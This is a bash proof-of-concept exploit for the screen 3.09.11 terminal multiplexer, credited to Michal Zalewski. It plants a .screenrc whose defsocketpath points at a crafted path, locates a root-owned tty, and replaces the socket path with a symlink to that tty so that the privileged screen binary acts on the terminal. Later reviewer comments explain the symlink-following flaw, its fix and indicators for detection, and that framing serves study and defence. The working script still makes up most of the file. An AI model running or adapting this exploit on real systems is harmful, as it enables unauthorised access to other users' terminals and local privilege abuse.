#!/bin/bash

#               **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
#               **DO NOT DISTRIBUTE**
#

# NOTE(review): historical proof-of-concept kept for reference. The weakness it
# exercises is symlink following on a user-controlled socket path
# (`defsocketpath`) by a screen binary running with elevated privileges; the
# fix class is for the privileged program to lstat/O_NOFOLLOW its socket path
# and refuse paths inside directories it does not own. Code below is left
# byte-for-byte as written; only comments were added.

# Binary under test. The script bails out below unless it is executable.
SCREEN=/usr/bin/screen
# Every file this shell creates from here on keeps its full requested mode
# (the .screenrc written below comes out 0666). A world-readable/-writable
# .screenrc carrying a non-default defsocketpath is also the artefact a
# defender can look for.
umask 0

if [ ! -x $SCREEN ]; then
  echo "I can't execute $SCREEN..."
  exit 0
fi

# Path screen will be told to use for its socket (see `defsocketpath` below).
# awk deliberately appends a trailing space to $HOME before the suffix, and
# $LINK is later expanded unquoted in the ln calls, so it word-splits there.
# Fragile by construction; kept as written.
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa

# Refuse to run if something already exists at the chosen socket path.
if [ -f "$LINK" ]; then
  echo "DAMN. I don't have usable pts socket available..."
  exit 0
fi

echo -ne "Finding root owned tty...\t\t"
unset TTY

# Scan candidate terminal devices for one owned by uid 0 (third column of
# `ls -ln`). Parsing ls output is unreliable in general, and an unmatched
# glob stays literal (ls then errors to stderr); kept as written.
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
  if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
     TTY="$x"
     break
  fi
done

echo -n "$TTY"

if [ "$TTY" = "" ]; then
  echo -e "\nI can't find a root owned tty!"
  exit 0
fi

# Needs to write the rc file in $HOME and work from /tmp (`-o` is the
# deprecated test(1) OR).
if [ ! -w $HOME -o ! -w /tmp ]; then
  echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
  exit 0
fi

# Overwrites the user's own .screenrc. The `defsocketpath` line moves screen's
# socket out of its default per-user socket directory to $LINK — for
# monitoring, an rc file whose defsocketpath points outside the default
# directory is the indicator worth alerting on.
cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo  * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_

echo -ne "\nStarting screen...\t\t\t"

# Start a detached session named `00` using the rc written above; output is
# discarded. `echo $!` in backticks is just a roundabout $!.
$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
SCPID=`echo $!`

echo -n "PID: $SCPID"

# `$# -ge 0` is always true, so this loop is a one-second delay, nothing more.
while :; do
  sleep 1
  if [ "$#" -ge "0" ]; then
    break
  fi
done

# Work from /tmp. $LINK is unquoted here (and in the ln below), so the
# trailing space from L28 splits it into two arguments; kept as written.
cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"

# Poll up to ~5 s for screen to create something at $LINK. No failure branch:
# on timeout the script continues regardless.
CNT=5   # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
  let CNT=$CNT-1
  sleep 1
done
echo -n "Done."

# The symlink-following step: the socket path is swapped for a link to the
# root-owned tty found earlier, so whatever the privileged screen later does
# to "its socket" presumably lands on the tty instead. Detection: symlinks
# under /tmp or $HOME pointing at /dev/tty* or /dev/pts/* created by an
# unprivileged user.
echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null

echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."

# Ask screen to clean up stale sockets, then remove the rc file and link.
# Any mode/ownership change screen made on the tty is not reverted here.
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null

echo -ne "\rComplete.\n"

# Exits non-zero even on the "success" path; the status is not meaningful.
exit 1

